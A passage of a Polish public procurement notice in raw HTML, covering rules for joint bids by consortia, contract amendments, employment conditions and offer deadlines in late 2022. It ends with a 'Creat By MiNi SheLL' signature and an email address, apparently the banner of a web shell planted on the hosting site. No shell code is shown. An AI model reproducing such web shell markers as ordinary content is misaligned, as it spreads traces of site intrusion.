zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia składając wspólną ofertę,<br/>w takim przypadku ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>4.2 Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia mogą być:<br/>a) spółka cywilna – w rozumieniu przepisów art. 860-875 KC,<br/>b) Wykonawcy, którzy zawarli porozumienie w celu wspólnego ubiegania się o udzielenie<br/>zamówienia, nie będący spółką cywilną w rozumieniu przepisów KC np.: tak zwane<br/>„konsorcjum” dwóch lub więcej Wykonawców.<br/>4.3 Wykonawcy, którzy wspólnie ubiegają się o zamówienie, ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego, albo<br/>reprezentowania w postępowaniu i zawarcia umowy.<br/>4.4 Każdy Wykonawca, spośród Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, składa dokumenty, które Zamawiający określił w Rozdziale X pkt 1 i 2 SWZ. W<br/>zakresie spełnienia warunków udziału w postępowaniu, o których mowa w art. 273 ust. 1 ustawy<br/>Wykonawcy wspólnie ubiegający się o zamówienie składają dokumenty w taki sposób, by przy<br/>ich ocenie wspólnie spełniali ww. warunki. W przypadku opisu warunków udziału w<br/>postępowaniu, w zakresie określonym w art. 273 ust. 1 ustawy. wystarczającym jest, jeśli jeden<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego wykaże<br/>spełnienie określonego warunku, powyższe oznacza, że warunek spełnia w całości konsorcjum<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany istotne postanowień zawartej umowy w stosunku do treści złożonej przez Wykonawcę<br/>oferty, która została wybrana jako oferta najkorzystniejsza, są Istotna zmiana postanowień<br/>zawartej umowy wymaga formy pisemnej (aneks do umowy) pod rygorem nieważności i wymaga<br/>akceptacji każdej ze Stron umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-30 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com